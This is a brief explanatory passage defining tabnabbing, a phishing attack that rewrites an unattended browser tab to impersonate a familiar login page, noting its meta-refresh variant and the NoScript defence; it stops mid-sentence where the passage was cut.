What is Tabnabbing?

Tabnabbing is a computer exploit and
phishing attack, which persuades users
to submit their login details and
passwords to popular websites by
impersonating those sites and convincing
the user that the site is genuine. The
attack's name was coined in early 2010
by Aza Raskin, a security researcher
and design expert.
The attack takes advantage of user
trust and inattention to detail in
regard to tabs, and the ability of
modern web pages to rewrite tabs and
their contents a long time after the
page is loaded. Tabnabbing operates in
reverse of most phishing attacks in that
it doesn’t ask users to click on an
obfuscated link but instead loads a fake
page in one of the open tabs in your
browser.
The exploit employs scripts to rewrite a
page of average interest with an
impersonation of a well-known website,
when left unattended for some time. A
user who returns after a while and sees
the rewritten page may be induced to
believe the page is legitimate and enter
their login, password and other details
that will be used for improper purposes.
The attack can be made more likely to
succeed if the script checks for well
known Web sites the user has loaded in
the past or in other tabs, and loads a
simulation of the same sites. This attack
can be done even if JavaScript is
disabled, using the "meta refresh" meta
element, an HTML attribute used for
page redirection that causes a reload of
a specified new page after a given time
interval.
The NoScript extension for Mozilla
Firefox defends both from the
JavaScript-based and from the
scriptless attack, based on meta
refresh, by preventing inactive tabs